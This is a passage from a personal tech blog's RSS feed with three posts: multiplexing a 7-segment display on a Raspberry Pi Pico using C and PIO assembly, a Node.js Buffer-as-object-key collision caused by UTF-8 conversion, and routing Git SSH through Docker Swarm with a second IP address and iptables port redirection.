    <img src="https://deadlime.hu/uploads/2022/7segment.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">The <a href="https://www.hestore.hu/prod_10042385.html">SH5463AW-14</a></p>

<p>We need to turn on and off 33 segments (the central <code>:</code> counts as a single segment) that make up the characters and the extra dots. And we only have 14 pins to do this. Something strange is going on here. The trick is that we can only turn on one character at a time. Good news is that if we switch between characters really quick the lame human eyes will think that all four are lit.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/7segment_diagram.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>To turn on a specific segment we have to set the pin in the bottom row to 1 and the COM pin in the top row to 0. If we want to display the same character in multiple places we can set multiple COM pins to 0, but in reality it might not worth the hassle.</p>
<p>Let's look at a - not so - short example. Let's say we want to display <code>12:34</code>:</p>
<ol>
<li>set pin <code>9</code> and <code>4</code> to 1 and pin <code>14</code> to 0</li>
<li>wait a bit</li>
<li>set pin <code>13</code>, <code>9</code>, <code>2</code>, <code>1</code>, <code>5</code> to 1 and pin <code>11</code> to 0</li>
<li>wait a bit</li>
<li>set pin <code>8</code> to 1 and pin <code>7</code> to 0</li>
<li>wait a bit</li>
<li>set pin <code>13</code>, <code>9</code>, <code>4</code>, <code>2</code>, <code>5</code> to 1 and pin <code>10</code> to 0</li>
<li>wait a bit</li>
<li>set pin <code>9</code>, <code>4</code>, <code>12</code>, <code>5</code> to 1 and pin <code>6</code> to 0</li>
<li>wait a bit</li>
<li>jump back to step one</li>
</ol>
<p>If we won't jump back to the beginning and do this till the end of time then we would see the numbers lit up on the display only for a brief moment.</p>
<h3>First try</h3>
<p>First I wanted to transform the process above into C code. With that I can test that I properly understanded the display datasheet, the Pico SDK documentation and I wired it properly. At this stage using PIO would be an unnecessary complication. The whole code is on <a href="https://github.com/deadlime/pico-7-segment-display/tree/main/1_c-only">Github</a>.</p>
<p>Let's start with some configuration:</p>
<pre class="file"><code>c_only.c
</code></pre>
<pre><code class="hljs arduino"><span class="hljs-keyword">const</span> uint pin_map_display_to_pico[] = {
  <span class="hljs-number">0</span>,
  <span class="hljs-number">16</span>, <span class="hljs-number">17</span>, <span class="hljs-number">18</span>, <span class="hljs-number">19</span>, <span class="hljs-number">20</span>, <span class="hljs-number">21</span>, <span class="hljs-number">22</span>,
  <span class="hljs-number">9</span>, <span class="hljs-number">10</span>, <span class="hljs-number">11</span>, <span class="hljs-number">12</span>, <span class="hljs-number">13</span>, <span class="hljs-number">14</span>, <span class="hljs-number">15</span>,
};

<span class="hljs-keyword">const</span> uint A  = pin_map_display_to_pico[<span class="hljs-number">13</span>];
<span class="hljs-keyword">const</span> uint B  = pin_map_display_to_pico[<span class="hljs-number">9</span>];
<span class="hljs-keyword">const</span> uint C  = pin_map_display_to_pico[<span class="hljs-number">4</span>];
<span class="hljs-keyword">const</span> uint D  = pin_map_display_to_pico[<span class="hljs-number">2</span>];
<span class="hljs-keyword">const</span> uint E  = pin_map_display_to_pico[<span class="hljs-number">1</span>];
<span class="hljs-keyword">const</span> uint F  = pin_map_display_to_pico[<span class="hljs-number">12</span>];
<span class="hljs-keyword">const</span> uint G  = pin_map_display_to_pico[<span class="hljs-number">5</span>];
<span class="hljs-keyword">const</span> uint DP = pin_map_display_to_pico[<span class="hljs-number">3</span>];
<span class="hljs-keyword">const</span> uint D5 = pin_map_display_to_pico[<span class="hljs-number">8</span>];

<span class="hljs-keyword">const</span> uint COM_1    = pin_map_display_to_pico[<span class="hljs-number">14</span>];
<span class="hljs-keyword">const</span> uint COM_2    = pin_map_display_to_pico[<span class="hljs-number">11</span>];
<span class="hljs-keyword">const</span> uint COM_3    = pin_map_display_to_pico[<span class="hljs-number">10</span>];
<span class="hljs-keyword">const</span> uint COM_4    = pin_map_display_to_pico[<span class="hljs-number">6</span>];
<span class="hljs-keyword">const</span> uint COM_DOTS = pin_map_display_to_pico[<span class="hljs-number">7</span>];
</code></pre>
<p>I skipped the <code>D6</code>, it's the same as the <code>D5</code>. The <code>pin_map_display_to_pico</code> array contains which display pin corresponds to which Pico pin (zero is not valid). On the Pico I used pins 9 to 22.</p>
<pre class="file"><code>c_only.c
</code></pre>
<pre><code class="hljs arduino">stdio_init_all();
<span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">1</span>; i &lt; <span class="hljs-keyword">sizeof</span>(pin_map) / <span class="hljs-keyword">sizeof</span>(pin_map[<span class="hljs-number">0</span>]); ++i) {
    gpio_init(pin_map[i]);
    gpio_set_dir(pin_map[i], GPIO_OUT);
}
</code></pre>
<p>Some more initialization before getting to the point. We have to set all the pins to output mode. Then we can write a long infinite loop that does almost the same thing that we discussed before.</p>
<pre class="file"><code>c_only.c
</code></pre>
<pre><code class="hljs arduino"><span class="hljs-comment">// select and display the colon</span>
gpio_put(COM_DOTS, <span class="hljs-number">0</span>);
gpio_put(D5, <span class="hljs-number">1</span>);

<span class="hljs-keyword">while</span> (<span class="hljs-literal">true</span>) {
  <span class="hljs-comment">// select the first character place</span>
  gpio_put(COM_1, <span class="hljs-number">0</span>);
  gpio_put(COM_2, <span class="hljs-number">1</span>);
  gpio_put(COM_3, <span class="hljs-number">1</span>);
  gpio_put(COM_4, <span class="hljs-number">1</span>);

  <span class="hljs-comment">// display a one</span>
  gpio_put(A, <span class="hljs-number">0</span>);
  gpio_put(B, <span class="hljs-number">1</span>);
  gpio_put(C, <span class="hljs-number">1</span>);
  gpio_put(D, <span class="hljs-number">0</span>);
  gpio_put(E, <span class="hljs-number">0</span>);
  gpio_put(F, <span class="hljs-number">0</span>);
  gpio_put(G, <span class="hljs-number">0</span>);
  gpio_put(DP, <span class="hljs-number">0</span>);

  <span class="hljs-comment">// wait a bit</span>
  sleep_ms(<span class="hljs-number">2</span>);

  <span class="hljs-comment">// select the second character place</span>
  gpio_put(COM_1, <span class="hljs-number">1</span>);
  gpio_put(COM_2, <span class="hljs-number">0</span>);
  gpio_put(COM_3, <span class="hljs-number">1</span>);
  gpio_put(COM_4, <span class="hljs-number">1</span>);

  <span class="hljs-comment">// display a two</span>
  gpio_put(A, <span class="hljs-number">1</span>);
  gpio_put(B, <span class="hljs-number">1</span>);
  gpio_put(C, <span class="hljs-number">0</span>);
  gpio_put(D, <span class="hljs-number">1</span>);
  gpio_put(E, <span class="hljs-number">1</span>);
  gpio_put(F, <span class="hljs-number">0</span>);
  gpio_put(G, <span class="hljs-number">1</span>);
  gpio_put(DP, <span class="hljs-number">0</span>);

  <span class="hljs-comment">// wait a bit</span>
  sleep_ms(<span class="hljs-number">2</span>);

  <span class="hljs-comment">// select the third character place</span>
  gpio_put(COM_1, <span class="hljs-number">1</span>);
  gpio_put(COM_2, <span class="hljs-number">1</span>);
  gpio_put(COM_3, <span class="hljs-number">0</span>);
  gpio_put(COM_4, <span class="hljs-number">1</span>);

  <span class="hljs-comment">// display a three</span>
  gpio_put(A, <span class="hljs-number">1</span>);
  gpio_put(B, <span class="hljs-number">1</span>);
  gpio_put(C, <span class="hljs-number">1</span>);
  gpio_put(D, <span class="hljs-number">1</span>);
  gpio_put(E, <span class="hljs-number">0</span>);
  gpio_put(F, <span class="hljs-number">0</span>);
  gpio_put(G, <span class="hljs-number">1</span>);
  gpio_put(DP, <span class="hljs-number">0</span>);

  <span class="hljs-comment">// wait a bit</span>
  sleep_ms(<span class="hljs-number">2</span>);

  <span class="hljs-comment">// select the fourth character place</span>
  gpio_put(COM_1, <span class="hljs-number">1</span>);
  gpio_put(COM_2, <span class="hljs-number">1</span>);
  gpio_put(COM_3, <span class="hljs-number">1</span>);
  gpio_put(COM_4, <span class="hljs-number">0</span>);

  <span class="hljs-comment">// display a four</span>
  gpio_put(A, <span class="hljs-number">0</span>);
  gpio_put(B, <span class="hljs-number">1</span>);
  gpio_put(C, <span class="hljs-number">1</span>);
  gpio_put(D, <span class="hljs-number">0</span>);
  gpio_put(E, <span class="hljs-number">0</span>);
  gpio_put(F, <span class="hljs-number">1</span>);
  gpio_put(G, <span class="hljs-number">1</span>);
  gpio_put(DP, <span class="hljs-number">0</span>);

  <span class="hljs-comment">// wait a bit</span>
  sleep_ms(<span class="hljs-number">2</span>);
}
</code></pre>
<p>The only difference is that the colon does not depend on any other characters (they do not share pins) so we can turn it on at the very beginning and forget about it. It's worth checking it out that this way the <code>:</code> lights up more than the rest of the characters.</p>
<h3>A little bit of PIO</h3>
<p>I wanted to start with something simple here also just to see that everything is working properly. And the code for this is on <a href="https://github.com/deadlime/pico-7-segment-display/tree/main/2_basic-pio">Github</a> as well.</p>
<pre class="file"><code>basic_pio.pio
</code></pre>
<pre><code class="hljs armasm"><span class="hljs-symbol">.program</span> <span class="hljs-keyword">basic_pio
</span>
<span class="hljs-symbol">.define</span> PUBLIC pin_count <span class="hljs-number">14</span>
<span class="hljs-symbol">
loop:</span>
  pull
  out pins, pin_count
  jmp loop
</code></pre>
<p>The <code>pull</code> gets the 32 bit of data sent by the C code (and blocks the execution until the data arrives) and the <code>out</code> will write out 14 bits to the pins we specified earlier (the rest of the data will be overwritten by the next <code>pull</code>) and we start the whole thing all over. The publicly defined <code>pin_count</code> will be accessible by the C code as <code>basic_pio_pin_count</code>.</p>
<p>Where did we specify the pins in use? The PIO file has a little bit of C code that sets up the whole program (I wouldn't say that I like mixing up languages in a single file and the CLion didn't like it either, but that's the way it is):</p>
<pre class="file"><code>basic_pio.pio
</code></pre>
<pre><code class="hljs arduino">% c-sdk {
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">basic_pio_program_init</span><span class="hljs-params">(PIO pio, uint sm, uint offset, uint pin)</span> </span>{
  pio_sm_config <span class="hljs-built_in">config</span> = basic_pio_program_get_default_config(offset);

  sm_config_set_out_pins(&amp;<span class="hljs-built_in">config</span>, pin, basic_pio_pin_count);

  <span class="hljs-keyword">for</span> (uint i = <span class="hljs-number">0</span>; i &lt; basic_pio_pin_count; ++i) {
    pio_gpio_init(pio, pin + i);
  }
  pio_sm_set_consecutive_pindirs(pio, sm, pin, basic_pio_pin_count, <span class="hljs-literal">true</span>);

  pio_sm_init(pio, sm, offset, &amp;<span class="hljs-built_in">config</span>);
  pio_sm_set_enabled(pio, sm, <span class="hljs-literal">true</span>);
}
%}
</code></pre>
<p>Next is the C code that uses this PIO program. We send 32 bits of data to the program but only 14 bits will be really useful. These 14 bits will define the state of the 14 pins. The first bit from the right is the value of pin 9 and the last bit is the value of pin 22.</p>
<pre><code class="hljs arduino"><span class="hljs-comment">//                             pin 9</span>
<span class="hljs-comment">//                                 v</span>
uint example_data = <span class="hljs-number">0b00010000000010</span>;
<span class="hljs-comment">//                    ^</span>
<span class="hljs-comment">//                    pin 22</span>
</code></pre>
<p>We can define some helper constants so we can construct the numbers more easily. Defining the COMs is a bit strange because we have to set every other COM to one, not the one we want to use.</p>
<pre class="file"><code>basic_pio.c
</code></pre>
<pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> START_PIN 9</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> A  1 &lt;&lt; (14 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> B  1 &lt;&lt; (10 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> C  1 &lt;&lt; (19 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> D  1 &lt;&lt; (17 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> E  1 &lt;&lt; (16 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> F  1 &lt;&lt; (13 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> G  1 &lt;&lt; (20 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> DP 1 &lt;&lt; (18 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> D5 1 &lt;&lt; (9 - START_PIN)</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> COM_1    1 &lt;&lt; (15 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> COM_2    1 &lt;&lt; (12 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> COM_3    1 &lt;&lt; (11 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> COM_4    1 &lt;&lt; (21 - START_PIN)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> COM_DOTS 1 &lt;&lt; (22 - START_PIN)</span>

<span class="hljs-keyword">const</span> uint one   = B|C|D5;
<span class="hljs-keyword">const</span> uint two   = A|B|D|E|G;
<span class="hljs-keyword">const</span> uint three = A|B|C|D|G;
<span class="hljs-keyword">const</span> uint four  = B|C|F|G|DP;

<span class="hljs-keyword">const</span> uint com_1 = COM_2|COM_3|COM_4;
<span class="hljs-keyword">const</span> uint com_2 = COM_1|COM_3|COM_4|COM_DOTS;
<span class="hljs-keyword">const</span> uint com_3 = COM_1|COM_2|COM_4|COM_DOTS;
<span class="hljs-keyword">const</span> uint com_4 = COM_1|COM_2|COM_3|COM_DOTS;
</code></pre>
<p>A little bit of a trick here is that we hid the display of the <code>:</code> into the <code>one</code> variable. This way we get rid of the more shiny <code>:</code> problem as well.</p>
<p>To use the PIO program we have to include the header file generated by CMake. For me this was a <code>#include &quot;basic_pio.pio.h&quot;</code> line at the top of the C file. And we can continue with setting up the program.</p>
<pre class="file"><code>basic_pio.c
</code></pre>
<pre><code class="hljs arduino"><span class="hljs-keyword">const</span> PIO pio = pio0;

<span class="hljs-keyword">const</span> uint offset = pio_add_program(pio, &amp;basic_pio_program);
<span class="hljs-keyword">const</span> uint sm = pio_claim_unused_sm(pio, <span class="hljs-literal">true</span>);

basic_pio_program_init(pio, sm, offset, START_PIN);
</code></pre>
<p>We add the program, get a state machine of our own and initialize it.</p>
<p>Only the display logic is left for us to do now. It's a bit shorter than the C-only solution but it basically does the same thing.</p>
<pre class="file"><code>basic_pio.c
</code></pre>
<pre><code class="hljs arduino"><span class="hljs-keyword">while</span> (<span class="hljs-literal">true</span>) {
  pio_sm_put(pio, sm, com_1|one);
  sleep_ms(<span class="hljs-number">2</span>);
  pio_sm_put(pio, sm, com_2|two);
  sleep_ms(<span class="hljs-number">2</span>);
  pio_sm_put(pio, sm, com_3|three);
  sleep_ms(<span class="hljs-number">2</span>);
  pio_sm_put(pio, sm, com_4|four);
  sleep_ms(<span class="hljs-number">2</span>);
}
</code></pre>
<h3>The final result</h3>
<p>In the last example the timing of the display was still handled by the C code which is not an ideal situation if you also want to do something else in the code beside driving the display. It would be nice if we could just pass the PIO all the data and it would just take care of all the things display related.</p>
<p>To display all four characters we need four times 14 bits of data, so a 32 bit variable won't be enough. Lucky for us that the state machine has two registers we could use (<code>x</code> and <code>y</code>), so we could send the content of the display as two 28 bit data. The PIO program would store those data into the two registers and send it out to the GPIO in 14 bit chunks with the right timing.</p>
<pre class="file"><code>advanced_pio.pio
</code></pre>
<pre><code class="hljs armasm"><span class="hljs-symbol">.program</span> advanced_pio

<span class="hljs-symbol">.define</span> PUBLIC pin_count <span class="hljs-number">14</span>

<span class="hljs-symbol">.wrap_target</span>
  <span class="hljs-keyword">mov </span>isr, x
  <span class="hljs-keyword">mov </span>x, y
  <span class="hljs-keyword">mov </span>y, isr

  pull noblock
  <span class="hljs-keyword">mov </span>x, osr

  out pins, pin_count [<span class="hljs-number">5</span>]
  out pins, pin_count
<span class="hljs-symbol">.wrap</span>
</code></pre>
<p>The <code>.wrap_target</code>/<code>.wrap</code> part is just like a <code>loop:</code>/<code>jmp loop</code> around the whole thing but it does not cost an extra instruction.</p>
<p>In the first block we switch the contents of the <code>x</code> and <code>y</code> registers. We use the <code>isr</code> (Input Shift Register) as a temporary storage for this. It's not a problem because it isn't in use in our case (it would hold the data coming from the GPIO if the pins would be in input mode).</p>
<p>Next thing is a non-blocking <code>pull</code> instruction. It would put the data coming from the C code into the <code>osr</code> (Output Shift Register, data going to the GPIO pins). A nice property of a non-blocking <code>pull</code> is that if we don't have data then it will use the data from the <code>x</code> register. This way we already solved that if we don't have new data we will display the old data.</p>
<p>Next we will send out 14 bits of data to the pins two times. The <code>[5]</code> at the end of the first <code>out</code> is a five instruction long delay so from the point of the display there will be the same amount of delay after each <code>out</code> call.</p>
<p>The end result will be that we get the data from <code>x</code> and <code>y</code> in turns and we update the data in the registers in turns as well.</p>
<p>And of course we have a similar initialization function for this PIO program as well.</p>
<pre class="file"><code>advanced_pio.pio
</code></pre>
<pre><code class="hljs arduino">% c-sdk {
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">"hardware/clocks.h"</span></span>

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">void</span> <span class="hljs-title">advanced_pio_program_init</span><span class="hljs-params">(PIO pio, uint sm, uint offset, uint pin)</span> </span>{
  pio_sm_config <span class="hljs-built_in">config</span> = advanced_pio_program_get_default_config(offset);

  sm_config_set_out_pins(&amp;<span class="hljs-built_in">config</span>, pin, advanced_pio_pin_count);

  <span class="hljs-keyword">float</span> clock_divider = (<span class="hljs-keyword">float</span>) clock_get_hz(clk_sys) / <span class="hljs-number">2000000</span>;
  sm_config_set_clkdiv(&amp;<span class="hljs-built_in">config</span>, clock_divider);

  <span class="hljs-keyword">for</span> (uint i = <span class="hljs-number">0</span>; i &lt; advanced_pio_pin_count; ++i) {
    pio_gpio_init(pio, pin + i);
  }
  pio_sm_set_consecutive_pindirs(pio, sm, pin, advanced_pio_pin_count, <span class="hljs-literal">true</span>);

  pio_sm_init(pio, sm, offset, &amp;<span class="hljs-built_in">config</span>);
  pio_sm_set_enabled(pio, sm, <span class="hljs-literal">true</span>);
}
%}
</code></pre>
<p>The only difference is that we call <code>sm_config_set_clkdiv</code> function to slow down the state machine so we alternate the numbers on the display at the right pace.</p>
<pre class="file"><code>advanced_pio.c
</code></pre>
<pre><code class="hljs arduino">pio_sm_put(pio, sm, ((com_1|one) &lt;&lt; advanced_pio_pin_count) | com_2|two);
pio_sm_put(pio, sm, ((com_3|three) &lt;&lt; advanced_pio_pin_count) | com_4|four);

<span class="hljs-keyword">while</span> (<span class="hljs-literal">true</span>) {
  sleep_ms(<span class="hljs-number">1000</span>);
}
</code></pre>
<p>Most of the C code is the same as the last example as well. We only changed the parts around the infinite loop a bit. We only send the data to the PIO program one time and after that we can do anything in the C code, the display will be updated regardless. And the code for this example is also on <a href="https://github.com/deadlime/pico-7-segment-display/tree/main/3_advanced-pio">Github</a>.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Key questions</title>
            <link>https://deadlime.hu/en/2022/10/20/key-questions/</link>
            <pubDate>Thu, 20 Oct 2022 18:13:00 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[JavaScript]]></category>
                    
            <guid isPermaLink="false">735aa30c40c798acd14ea30850e993aa</guid>
            <description>Not every data is what it seems to be</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/mailboxes.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>There is an ancient mayan saying that computers can solve a lot of problems that we wouldn't have to solve without them. Today, we can sink our teeth into a problem just like that. It pairs really well with this lightning talk from 2012 called <a href="https://www.destroyallsoftware.com/talks/wat">Wat</a>.</p>
<p>My own Wat-moment started with the <code>Buffer</code> class. Let's get two of them right away.</p>
<pre><code class="hljs shell"><span class="hljs-meta">$</span><span class="bash"> node</span>
<span class="hljs-meta">&gt;</span><span class="bash"> data1 = Buffer.from([0xf5, 0xcf, 0xe2, 0xf0, 0xef])</span>
&lt;Buffer f5 cf e2 f0 ef&gt;
<span class="hljs-meta">&gt;</span><span class="bash"> data2 = Buffer.from([0xfe, 0x99, 0x88, 0xeb, 0xd9])</span>
&lt;Buffer fe 99 88 eb d9&gt;
</code></pre>
<p>It's clearly visible to the naked eye that these are indeed two different buffers, but the Node.js can also confirm it for us:</p>
<pre><code class="hljs shell"><span class="hljs-meta">&gt;</span><span class="bash"> data1 === data2</span>
false
</code></pre>
<p>That's all nice and shiny, but let's look at another example.</p>
<pre><code class="hljs shell"><span class="hljs-meta">&gt;</span><span class="bash"> container = {}</span>
{}
<span class="hljs-meta">&gt;</span><span class="bash"> container[data1] = <span class="hljs-string">'foo'</span></span>
'foo'
<span class="hljs-meta">&gt;</span><span class="bash"> container[data2]</span>
???
</code></pre>
<p>What will be the value of the last expression?</p>
<p>a) <code>null</code><br />
b) <code>undefined</code><br />
c) it creates a black hole in place of the node interpreter<br />
d) nothing</p>
<p>Maybe a lot of people would go with the <code>b</code>. Maybe someone who knows Node.js a bit better would pick <code>c</code>. But the right answer is so terrible that it's not even an option.</p>
<pre><code class="hljs shell"><span class="hljs-meta">&gt;</span><span class="bash"> container[data2]</span>
'foo'
</code></pre>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/wat.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>What happens behind the scenes? A key of an object cannot be a <code>Buffer</code> type so it calls a <code>toString</code> method on it automatically. In case of the <code>Buffer</code> type, the <code>toString</code> can have an optional <code>encoding</code> parameter, but if it doesn't get one it'll go with <code>utf8</code> by default.</p>
<p>Our good-looking byte array doesn't know anything about behaving as a well formed UTF-8 string (that's why it's in our example), so all its bytes are replaced with the Unicode replacement character, which looks like this: �.</p>
<p>Both of our buffers are ignorant in this regard so at the end of the conversion they both contain only five replacement characters.</p>
<pre><code class="hljs shell"><span class="hljs-meta">&gt;</span><span class="bash"> data1.toString() === data2.toString()</span>
true
<span class="hljs-meta">&gt;</span><span class="bash"> container</span>
{ '�����': 'foo' }
</code></pre>
<p>After all this it seems reasonable that we get back the value for the first data when we use the second data as the key. Now imagine this situation deep down in an in-memory cache layer and the only symptom you see is that sometimes, maybe once in a hundred thousand cases the data from the cache is not right. It's a really fun experience.</p>
<p>What could we do about this? Maybe we are better not using the <code>Buffer</code> type as a key, but if we really need to, we could call the <code>toString</code> with a different <code>encoding</code> parameter. The examples below could all work in this case:</p>
<pre><code class="hljs shell"><span class="hljs-meta">&gt;</span><span class="bash"> data1.toString(<span class="hljs-string">'hex'</span>) === data2.toString(<span class="hljs-string">'hex'</span>)</span>
false
<span class="hljs-meta">&gt;</span><span class="bash"> data1.toString(<span class="hljs-string">'base64'</span>) === data2.toString(<span class="hljs-string">'base64'</span>)</span>
false
<span class="hljs-meta">&gt;</span><span class="bash"> data1.toString(<span class="hljs-string">'binary'</span>) === data2.toString(<span class="hljs-string">'binary'</span>)</span>
false
</code></pre>

]]></content:encoded>
        </item>
            <item>
            <title>Migration and madness</title>
            <link>https://deadlime.hu/en/2022/06/07/migration-and-madness/</link>
            <pubDate>Wed, 08 Jun 2022 15:26:35 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Docker Swarm]]></category>
                    <category><![CDATA[Git]]></category>
                    <category><![CDATA[Traefik]]></category>
                    
            <guid isPermaLink="false">188f8571e74ad89ade9fae196d7674db</guid>
            <description>How hard could it be to migrate a Git server to Docker Swarm?</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/containers.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>If you can read this post, the experiment was successful. I managed to migrate my development tools from a cloud virtual machine to an actual physical machine humming behind my back. But let's not rush forward that much and go back to the beginning.</p>
<p>I have a virtual machine running a couple of development-related tools. It has a <a href="https://gogs.io/">Gogs</a> Git server, a <a href="https://www.jenkins.io/">Jenkins</a> instance, a <a href="https://hub.docker.com/_/registry">Docker Registry</a>, and a Composer repository (a static HTML site generated by <a href="https://composer.github.io/satis/">Satis</a>). It doesn't get a lot of traffic, and the applications besides Jenkins are pretty lightweight. But the Jenkins is a bit problematic. For example, sometimes, it cannot build Docker images because it runs out of memory.</p>
<p>That's one of the reasons why I started to build a small home server (4 CPU cores, 16 GB of memory in a 20x20x6 centimeters little box) to migrate all the applications. It's running a <a href="https://docs.docker.com/engine/swarm/">Docker Swarm</a> as a single manager node with <a href="https://traefik.io/traefik/">Traefik</a> for the routing and <a href="https://www.portainer.io/solutions/docker">Portainer</a> for managing the Docker stacks. However, initial tests showed that moving the Git server won't be a smooth sail, so I didn't start the migration up until now.</p>
<p>Without the resource constraints, I decided to go with a GitLab installation. It can replace all four applications mentioned before: it operates as a <a href="https://docs.gitlab.com/ee/user/packages/container_registry/">Docker Registry</a>, as multiple <a href="https://docs.gitlab.com/ee/user/packages/package_registry/">Package Registries</a> (and Composer is among them), and Jenkins can be replaced with <a href="https://docs.gitlab.com/ee/ci/">GitLab CI</a>. Maybe my life would be easier this way (nope).</p>
<h3>The problem</h3>
<p>SSH is an old piece of furniture. It doesn't have such fancy accessories as the SNI support for TLS. There's no easy way to have a proxy or load balancer-like application that can route incoming connections based on specific criteria (like the target host of the connection) to different backend applications. It's a huge problem for us because the server already has an SSH server on port <code>22</code>, and the Git server running in Docker would also want to start an SSH server on port <code>22</code>. If that's not available, it could bind to port <code>2022</code>, for example, but that would transform this:</p>
<pre class="console"><code>$ git clone git@git.example.com:group-name/repository-name.git
</code></pre>
<p>Into this:</p>
<pre class="console"><code>$ git clone ssh://git@git.example.com:2022/group-name/repository-name.git
</code></pre>
<p>Alternatively, we could create a <code>.ssh/config</code> similar to this on every machine we want to clone repositories:</p>
<pre class="file"><code>.ssh/config
</code></pre>
<pre><code>Host git.example.com
    Port 2022
</code></pre>
<p>Not a big issue, but I didn't want to make this compromise. Certainly, there are other solutions, like <a href="http://www.ateijelo.com/blog/2016/07/09/share-port-22-between-docker-gogs-ssh-and-local-system">the article</a> the Gogs Docker image documentation mentions, but that also feels too hacky to me.</p>
<h3>The solution?</h3>
<p>Then I got an idea. I don't know why exactly now. This migration project was on pause for quite a while. We could assign multiple IP addresses to the machine, the host SSH could listen on one of the IP addresses, and the Git SSH could listen on the other IP address, both on port <code>22</code>.</p>
<pre class="console"><code>$ host example.com
example.com has address 192.168.0.23
$ host git.example.com
git.example.com has address 192.168.0.24
</code></pre>
<p>Such elegance, such beauty. I immediately started working on the implementation. First, I needed a second IP address. On a local network, it's not a big issue. Even if the machine doesn't have an extra network adapter, it could be solved. My host machine runs Debian, so I needed to do the following things:</p>
<pre class="file"><code>/etc/network/interfaces
</code></pre>
<pre><code>auto enp3s0:0
iface enp3s0:0 inet dhcp

auto enp3s0:1
iface enp3s0:1 inet static
  address 192.168.0.24
  netmask 255.255.255.0
</code></pre>
<p>As you can see, a network adapter can have multiple IP addresses. It gets the first one from the good old DHCP server from the router (based on the MAC address, it's also a fixed IP address), and the second one is a static one the machine sets to itself. One little change in the host SSH config and we are good to go:</p>
<pre class="file"><code>/etc/ssh/sshd_config
</code></pre>
<pre><code>ListenAddress 192.168.0.23
</code></pre>
<p>Now we can switch to the Docker side of things. Although it wouldn't be necessary, and it doesn't make much sense, I passed the connection through Traefik. This way, it is the one and only entry point in Docker.</p>
<pre class="file"><code>traefik.yaml
</code></pre>
<pre><code>version: &quot;3.2&quot;
services:
  traefik:
    image: traefik:v2.7.0
    command:
      - &quot;--entrypoints.gitssh.address=:22&quot;
    ports:
      - target: 22
        host_ip: 192.168.0.24
        published: 22
        protocol: tcp
        mode: host
    deploy:
      mode: global
</code></pre>
<p>These are just the relevant parts. The complete config looks a lot like <a href="https://github.com/deadlime/swarm-cluster-example/blob/master/ansible/roles/stacks/templates/traefik.yml.j2">what we created in a previous post</a>. Unfortunately, this first try ended up with an error that it could not recognize the <code>host_ip</code> key, so I changed it to the <code>- 192.168.0.24:22:22</code> short format, and that was good enough for it.</p>
<p>Everything works. I started a Gogs server to test it out. I could clone a repository and push back some data. Everything was awesome. Until I closed my host SSH connection to the server. I simply couldn't reconnect. It looked like the Git SSH was running on the other IP address as well. But that's impossible, right? We just told them to listen on a single IP address.</p>
<p>I needed to take a technical break until I found a VGA cable and an unused keyboard to restore my proper SSH connection with the server. I also managed to find out with a manual run of docker stack deploy that binding to an IP address was ignored in my config, but Portainer didn't share this irrelevant piece of information with me.</p>
<p>After some research, I even found a <a href="https://github.com/moby/moby/issues/26696">Github issue</a> that says that Swarm services can only bind to <code>0.0.0.0</code>.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/this-is-fine.jpg" width="310" height="300" alt="" title="" loading="lazy" />
</p>

<p>It looked like I had to throw my beautiful solution into the trash. Of course, I could run the Git server outside of Swarm, but that's like running it on port <code>2022</code>, and I couldn't allow that.</p>
<h3>The solution!</h3>
<p>After a couple days, I got another idea. We will listen on port <code>2022</code>. I know it sucks, but let me finish. If we get a connection on address <code>192.168.0.24</code> on port <code>22</code>, we could redirect it to port <code>2022</code>. We only need the following two iptables rules for that:</p>
<pre class="console"><code># iptables -t nat -I PREROUTING 1 -d 192.168.0.24/32 -p tcp -m tcp --dport 22 -j REDIRECT --to-port 2022
# iptables -A INPUT -i enp3s0 -p tcp -m tcp --dport 2022 -j ACCEPT
</code></pre>
<p>A slight drawback is that the Git SSH server is accessible on port <code>2022</code> too, but we may allow this bit of compromise here. There is nothing left to do but install and set up the GitLab server and migrate all the old data and processes into it. That wasn't a walk in the park either, but I may tell that story another time.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Using ipset the wrong way</title>
            <link>https://deadlime.hu/en/2022/03/25/using-ipset-the-wrong-way/</link>
            <pubDate>Fri, 25 Mar 2022 15:27:13 +0000</pubDate>
            
